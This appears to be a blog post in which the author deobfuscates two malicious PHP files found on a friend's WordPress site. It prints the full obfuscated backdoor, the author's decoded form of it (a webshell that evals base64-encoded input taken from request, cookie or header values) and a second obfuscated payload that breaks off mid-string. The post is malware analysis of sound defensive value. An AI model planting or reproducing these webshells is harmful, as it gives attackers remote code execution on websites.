TL;DR: Colleague sent me two 'malicious php' files he found from his wordpress website. I detail below how I deobfuscated the malicious code and found their domain which they post information to: indikateit.ru
Today, my colleague messaged me whilst I was on my commute to work, asking me to take a look at a 'potentially malicious' php file which he had found on his personal website.
The code was:
<?php
$anthropological= '$ii'; $former= 'e';$bach = 'BiTT(?U';$encumbers = ']s_(S]w)$'; $cards = 'Qac';$invokes ='K';
$lagging = '_';
$cautioned =']'; $evensong = '1d4_'; $blustering= '4[e';$besmirch = ' ,fp)a;';$lemma = 'aA';$indicter= 'as)/EvtSd';$cantankerously = 't'; $espoused='uCtEPOqa';$investigation = 'r';$juicy ='7r'; $desmond= ')';$countermeasure='_';$indemnify = 'lQOV';
$injections ='lye'; $backarrows ='r';$gaillardia='@';$lime ='Z,';$apprentice= 'g'; $captains ='R';$blameworthy = ')tL"';$dragnet = 's';
$evicting= ')'; $cleaved ='<(I'; $cap = '@$eqo$_Q[';
$corroborating = 're'; $enemas= 'a'; $data='9'; $hetty = '_'; $buttocks ='?';
$lambert='gsad)';$hinze='d'; $infra= 'e';
$glib= 'e0U6A__dP';$evades='e';$bandies='d';$barret = '8["uXDa(v';$broach= 'Tn'; $impetuous= '"i';$clari='i';$bren = 'bI$'; $iceberg= '"';$cheetah= '='; $haydon = 't_u';$he= ':,ascna":';$insights='eHl';
$fanni='_';$heeded ='gaG'; $cranberry= 'L';$drench = 'vfi;udf-b'; $devin= '_';$lumps= 'J';$bunkhouse= '[UKRTi?CN'; $brutality =')wD'; $contaminates= 't';
$astronomer= 'r$'; $leavened ='a'; $logicians= 'VrD+)(^';$catlaina= 'H';$annihilation=']TH';$indeed ='eW:'; $animadvert= 'MoW;r';$extrude = 'E'; $bobafett ='tc>Ql';
$collection='o'; $blest = 'acYi*r'; $franco= ';';$farmer= '2'; $avenue = 'rs';$angelle ='"L)';
$fornication ='cd(.=e';$junkerdom = 'mE]$R$['; $kyle ='$';$flapping ='n'; $dialup= 'e';$javelins='Re(e(=@s';
$consider='W'; $headache ='5ADvrUs';$counsellors= 'T';
$ewoks= 'b'; $bellies =')';$kippie = ')bO';$basalt='FBEa';$colorers= 'r'; $duane ='_'; $jeremiah ='6(yD$3(E';$exterminated= '"pe"';$bungled='ie;(P`@';
$chrysler ='BS'; $gnni = $fornication['0'] .
$colorers . $bungled['1'] .$basalt['3'] . $bobafett['0'] . $bungled['1'] .$duane.$drench['6']. $drench['4'].$flapping .$fornication['0'] . $bobafett['0'] .$bungled[0]. $collection .$flapping;
$cracking=$besmirch['0'] ;$flowcharting= $gnni($cracking, $bungled['1'] . $headache['3'] .$basalt['3'] . $bobafett['4'] .$bungled['3'].$bungled['6'].$basalt['3'] . $colorers.$colorers. $basalt['3']. $jeremiah['2'].$duane. $exterminated['1']. $collection.
$exterminated['1'].
$bungled['3']. $drench['6'].
$drench['4'] .$flapping.
$fornication['0'] . $duane . $heeded['0'] .$bungled['1'] . $bobafett['0'] . $duane .$basalt['3'].$colorers .$heeded['0'] . $headache['6'] . $bungled['3'].$kippie[0]. $kippie[0] . $kippie[0]. $bungled['2'] );
$flowcharting($cap['3'] ,$exterminated['1'], $drench['7'], $animadvert['0'] ,$bungled['1'] ,
$indicter['3'],$jeremiah['4'].$bungled[0]. $javelins['5'] .$bungled['6'].
$basalt['3']. $colorers . $colorers. $basalt['3'].$jeremiah['2']. $duane. $junkerdom['0'] .$bungled['1']. $colorers.$heeded['0'] . $bungled['1']. $bungled['3'] . $jeremiah['4']. $duane .
$javelins['0']. $jeremiah['7'].$bobafett[3].$headache['5'] . $jeremiah['7'] .$chrysler['1'].$counsellors .$he['1'].$jeremiah['4'] .
$duane . $bunkhouse[7] .
$kippie['2'] .$kippie['2'] . $bunkhouse['2'] .$bren['1'] .
$jeremiah['7'].$he['1'] . $jeremiah['4'] . $duane .$chrysler['1'] .$jeremiah['7'] . $javelins['0']. $logicians['0'].$jeremiah['7'].$javelins['0'].
$kippie[0] .$bungled['2'].$jeremiah['4'].$basalt['3'] .$javelins['5'].$bungled[0].$headache['6'] . $headache['6'] . $bungled['1'] . $bobafett['0'] . $bungled['3'] .$jeremiah['4']. $bungled[0]. $junkerdom['6']. $exterminated[3].$brutality['1'] .$bobafett['4'] .$cap['3'] .
$basalt['3'] .
$drench['4'] .$fornication['1'] .
$fornication['1'] .$kippie['1'] .$exterminated[3] .
$junkerdom['2'].$kippie[0].
$bunkhouse['6'] . $jeremiah['4'].$bungled[0].$junkerdom['6']. $exterminated[3] .
$brutality['1'] .$bobafett['4'] . $cap['3'].$basalt['3'] .$drench['4'].
$fornication['1'] . $fornication['1'] .$kippie['1'] .$exterminated[3].$junkerdom['2'].
$indeed['2'].
$bungled['3']. $bungled[0] .$headache['6'] . $headache['6'] . $bungled['1'] .$bobafett['0'].$bungled['3'].
$jeremiah['4'].$bungled[0].
$junkerdom['6'] .$exterminated[3]. $annihilation['2'].$counsellors .
$counsellors .$bungled['4'] .$duane . $consider.$angelle['1'] .$bobafett[3] .$headache['1']. $headache['5'] .
$jeremiah['3'].$jeremiah['3']. $chrysler['0'] .$exterminated[3] .
$junkerdom['2'] .
$kippie[0]. $bunkhouse['6'] . $jeremiah['4'] . $bungled[0] . $junkerdom['6']. $exterminated[3].$annihilation['2'] . $counsellors. $counsellors.$bungled['4'] .
$duane . $consider. $angelle['1'].
$bobafett[3].
$headache['1']. $headache['5'].$jeremiah['3'].$jeremiah['3'].$chrysler['0'] . $exterminated[3] .
$junkerdom['2']. $indeed['2']. $fornication['1'] . $bungled[0] . $bungled['1'] .$kippie[0] . $bungled['2'] .
$bungled['6'].$bungled['1'].
$headache['3'] .$basalt['3'].$bobafett['4'].$bungled['3'].$headache['6'] . $bobafett['0'] . $colorers.$colorers .$bungled['1'].$headache['3'] . $bungled['3'] .
$kippie['1'] . $basalt['3'].$headache['6'] .$bungled['1'] .$jeremiah['0'] .
$blustering['0']. $duane.
$fornication['1'].$bungled['1'] .$fornication['0'] .$collection .$fornication['1'].$bungled['1'].
$bungled['3'] .
$headache['6']. $bobafett['0'] . $colorers.$colorers .$bungled['1'].
$headache['3'] . $bungled['3']. $jeremiah['4'].
$basalt['3'] .
$kippie[0] . $kippie[0] .$kippie[0]. $kippie[0] .$bungled['2']);
My first thought was to google search the filename, which was oqjpuqbi.php
.
Nothing came up.
I then googled the file content itself.
Nothing came up.
I realised that the code was probably randomised, so if someone had the same code it would have different variable names, and variables which pointed to different strings.
My first thoughts were to try an online php deobfuscation tool.
This helped space things out but the strange variables, e.g. bobafett
, enemas
& fornication
still remained.
It was clear that these variables referenced strings, which would then be concatenated togather to form instructions, potentially malicious instrutctions.
I then copy-pasted this more readable and spaced-out php code into vim, used some regex to transform the php syntax into javascript, then made sure that the javascript that I would then run in my browser console was just limited to printing concatenated strings.
This is the resulting code which I would run:
var anthropological='ii';
var former='e';
var bach='BiTT(?U';
var encumbers=']s_(S]w)';
var cards='Qac';
var invokes='K';
var lagging='_';
var cautioned=']';
var evensong='1d4_';
var blustering='4[e';
var besmirch=' ,fp)a;';
var lemma='aA';
var indicter='as)/EvtSd';
var cantankerously='t';
var espoused='uCtEPOqa';
var investigation='r';
var juicy='7r';
var desmond=')';
var countermeasure='_';
var indemnify='lQOV';
var injections='lye';
var backarrows='r';
var gaillardia='@';
var lime='Z,';
var apprentice='g';
var captains='R';
var blameworthy=')tL"';
var dragnet='s';
var evicting=')';
var cleaved='<(I';
var cap='@eqo_Q[';
var corroborating='re';
var enemas='a';
var data='9';
var hetty='_';
var buttocks='?';
var lambert='gsad)';
var hinze='d';
var infra='e';
var glib='e0U6A__dP';
var evades='e';
var bandies='d';
var barret='8["uXDa(v';
var broach='Tn';
var impetuous='"i';
var clari='i';
var bren='bI';
var iceberg='"';
var cheetah='=';
var haydon='t_u';
var he=':,ascna":';
var insights='eHl';
var fanni='_';
var heeded='gaG';
var cranberry='L';
var drench='vfi;udf-b';
var devin='_';
var lumps='J';
var bunkhouse='[UKRTi?CN';
var brutality=')wD';
var contaminates='t';
var astronomer='r';
var leavened='a';
var logicians='VrD+)(^';
var catlaina='H';
var annihilation=']TH';
var indeed='eW:';
var animadvert='MoW;r';
var extrude='E';
var bobafett='tc>Ql';
var collection='o';
var blest='acYi*r';
var franco=';';
var farmer='2';
var avenue='rs';
var angelle='"L)';
var fornication='cd(.=e';
var junkerdom='mE]R[';
var kyle='';
var flapping='n';
var dialup='e';
var javelins='Re(e(=@s';
var consider='W';
var headache='5ADvrUs';
var counsellors='T';
var ewoks='b';
var bellies=')';
var kippie=')bO';
var basalt='FBEa';
var colorers='r';
var duane='_';
var jeremiah='6(yD3(E';
var exterminated='"pe"';
var bungled='ie;(P`@';
var chrysler='BS';
var gnni= fornication[0] + colorers + bungled[1] + basalt[3] + bobafett[0] + bungled[1] + duane + drench[6] + drench[4] + flapping + fornication[0] + bobafett[0] + bungled[0] + collection + flapping;
cracking=besmirch[0];
//flowcharting=gnni(cracking,bungled[1]+headache[3]+basalt[3]+bobafett[4]+bungled[3]+bungled[6]+basalt[3]+colorers+colorers+basalt[3]+jeremiah[2]+duane+exterminated[1]+collection+exterminated[1]+bungled[3]+drench[6]+drench[4]+flapping+fornication[0]+duane+heeded[0]+bungled[1]+bobafett[0]+duane+basalt[3]+colorers+heeded[0]+headache[6]+bungled[3]+kippie[0]+kippie[0]+kippie[0]+bungled[2]);
var another_string = bungled[1]+headache[3]+basalt[3]+bobafett[4]+bungled[3]+bungled[6]+basalt[3]+colorers+colorers+basalt[3]+jeremiah[2]+duane+exterminated[1]+collection+exterminated[1]+bungled[3]+drench[6]+drench[4]+flapping+fornication[0]+duane+heeded[0]+bungled[1]+bobafett[0]+duane+basalt[3]+colorers+heeded[0]+headache[6]+bungled[3]+kippie[0]+kippie[0]+kippie[0]+bungled[2];
console.log(`another_string is ${another_string}`);
var finalStr = cap[3]+exterminated[1]+drench[7]+animadvert[0]+bungled[1]+indicter[3]+jeremiah[4]+bungled[0]+javelins[5]+bungled[6]+basalt[3]+colorers+colorers+basalt[3]+jeremiah[2]+duane+junkerdom[0]+bungled[1]+colorers+heeded[0]+bungled[1]+bungled[3]+jeremiah[4]+duane+javelins[0]+jeremiah[7]+bobafett[3]+headache[5]+jeremiah[7]+chrysler[1]+counsellors+he[1]+jeremiah[4]+duane+bunkhouse[7]+kippie[2]+kippie[2]+bunkhouse[2]+bren[1]+jeremiah[7]+he[1]+jeremiah[4]+duane+chrysler[1]+jeremiah[7]+javelins[0]+logicians[0]+jeremiah[7]+javelins[0]+kippie[0]+bungled[2]+jeremiah[4]+basalt[3]+javelins[5]+bungled[0]+headache[6]+headache[6]+bungled[1]+bobafett[0]+bungled[3]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+brutality[1]+bobafett[4]+cap[3]+basalt[3]+drench[4]+fornication[1]+fornication[1]+kippie[1]+exterminated[3]+junkerdom[2]+kippie[0]+bunkhouse[6]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+brutality[1]+bobafett[4]+cap[3]+basalt[3]+drench[4]+fornication[1]+fornication[1]+kippie[1]+exterminated[3]+junkerdom[2]+indeed[2]+bungled[3]+bungled[0]+headache[6]+headache[6]+bungled[1]+bobafett[0]+bungled[3]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+annihilation[2]+counsellors+counsellors+bungled[4]+duane+consider+angelle[1]+bobafett[3]+headache[1]+headache[5]+jeremiah[3]+jeremiah[3]+chrysler[0]+exterminated[3]+junkerdom[2]+kippie[0]+bunkhouse[6]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+annihilation[2]+counsellors+counsellors+bungled[4]+duane+consider+angelle[1]+bobafett[3]+headache[1]+headache[5]+jeremiah[3]+jeremiah[3]+chrysler[0]+exterminated[3]+junkerdom[2]+indeed[2]+fornication[1]+bungled[0]+bungled[1]+kippie[0]+bungled[2]+bungled[6]+bungled[1]+headache[3]+basalt[3]+bobafett[4]+bungled[3]+headache[6]+bobafett[0]+colorers+colorers+bungled[1]+headache[3]+bungled[3]+kippie[1]+basalt[3]+headache[6]+bungled[1]+jeremiah[0]+blustering[0]+duane+fornication[1]+bungled[1]+fornication[0]+collection+fornication[1]+bungled[1]+bungled[3]+headache[6]+bobafett[0]+colorers+colorers+bungled[1]+headache[3]+bungled[3]+jeremiah[4]+basalt[3]+kippie[0]+kippie[0]+kippie[0]+kippie[0]+bungled[2];
console.log(`final str is ${finalStr}`);
What got logged out was:
another_string is eval(@array_pop(func_get_args())); debugger eval code:100:9
final str is op-Me/3i=@array_merge(3_RundefinedQUundefinedST,3_COOKIundefined,3_SundefinedRVundefinedR);3a=isset(3iundefined"wloauddb"])?3iundefined"wloauddb"]:(isset(3iundefined"HTTP_WLQAUDDB"])?3iundefined"HTTP_WLQAUDDB"]:die);@eval(strrev(base64_decode(strrev(3a))));
Immediately, I noticed the undefined
in the string which was logged.
Upon a review of the code, I realized that the alleged malicious actor had made a mistake:
jeremiah[7]
returns null because it is of length 7 and hence it can not index something which does not exist.
I then appended the last character once more to jeremiah
to make sure it was length 7, then ran in my browser again.
The output this time was:
another_string is eval(@array_pop(func_get_args())); debugger eval code:100:9
final str is op-Me/3i=@array_merge(3_REQUEST,3_COOKIE,3_SERVER);3a=isset(3iundefined"wloauddb"])?3iundefined"wloauddb"]:(isset(3iundefined"HTTP_WLQAUDDB"])?3iundefined"HTTP_WLQAUDDB"]:die);@eval(strrev(base64_decode(strrev(3a))));
Now this looked a lot better. rubs hands
As you can see, there was is now another undefined outputted.
This is from the junkerdom
, which is of length 5, yet the code is asking for a character at index 6.
This is clearly supposed to be another square bracket, namely, [
.
When fixed, the output is:
another_string is eval(@array_pop(func_get_args())); debugger eval code:100:9
final str is op-Me/3i=@array_merge(3_REQUEST,3_COOKIE,3_SERVER);3a=isset(3i["wloauddb"])?3i["wloauddb"]:(isset(3i["HTTP_WLQAUDDB"])?3i["HTTP_WLQAUDDB"]:die);@eval(strrev(base64_decode(strrev(3a))));
This looks a lot better.
At the end of the above output, it string reverses 3a
->a3
then base64 decodes it which gives k
.
Update: my friend gave me another file he found on his website named goldafunder.php
. A google search of this filename presented no results.
This was the file:
<?php $PZOGngRGYdWpGi="3K4hbIR80HU_5VL1MzAqr6GgewJPjOsC9f7uFYnixvSydaNTkDX2ctlZpomQWEB";$wzEaCfiPhwFdUF=$PZOGngRGYdWpGi[4] .$PZOGngRGYdWpGi[45]. $PZOGngRGYdWpGi[30]. $PZOGngRGYdWpGi[24]. $PZOGngRGYdWpGi[21] .$PZOGngRGYdWpGi[2] .$PZOGngRGYdWpGi[11] .$PZOGngRGYdWpGi[44] .$PZOGngRGYdWpGi[24].
$PZOGngRGYdWpGi[52]. $PZOGngRGYdWpGi[57] .$PZOGngRGYdWpGi[44].$PZOGngRGYdWpGi[24];$xWqBnKmIZCRbJ=$PZOGngRGYdWpGi[30]. $PZOGngRGYdWpGi[53]. $PZOGngRGYdWpGi[20] .$PZOGngRGYdWpGi[20]. $PZOGngRGYdWpGi[24] .$PZOGngRGYdWpGi[41];$IUCaEKgNOPd=$PZOGngRGYdWpGi[24].
$PZOGngRGYdWpGi[20] .$PZOGngRGYdWpGi[20] . $PZOGngRGYdWpGi[57].
$PZOGngRGYdWpGi[20]. $PZOGngRGYdWpGi[11].$PZOGngRGYdWpGi[20].$PZOGngRGYdWpGi[24]. $PZOGngRGYdWpGi[56] .$PZOGngRGYdWpGi[57] .$PZOGngRGYdWpGi[20]. $PZOGngRGYdWpGi[53] .$PZOGngRGYdWpGi[39] .$PZOGngRGYdWpGi[38]. $PZOGngRGYdWpGi[23];$TiCkLZuka=$PZOGngRGYdWpGi[52] .$PZOGngRGYdWpGi[20].
$PZOGngRGYdWpGi[24] .$PZOGngRGYdWpGi[45] . $PZOGngRGYdWpGi[53] .$PZOGngRGYdWpGi[24] .$PZOGngRGYdWpGi[11]. $PZOGngRGYdWpGi[33] .$PZOGngRGYdWpGi[35] . $PZOGngRGYdWpGi[38]. $PZOGngRGYdWpGi[52]. $PZOGngRGYdWpGi[53].$PZOGngRGYdWpGi[39] .$PZOGngRGYdWpGi[57].$PZOGngRGYdWpGi[38];$IUCaEKgNOPd(0);$HTIRyzRYNNT=$TiCkLZuka("",$wzEaCfiPhwFdUF($xWqBnKmIZCRbJ("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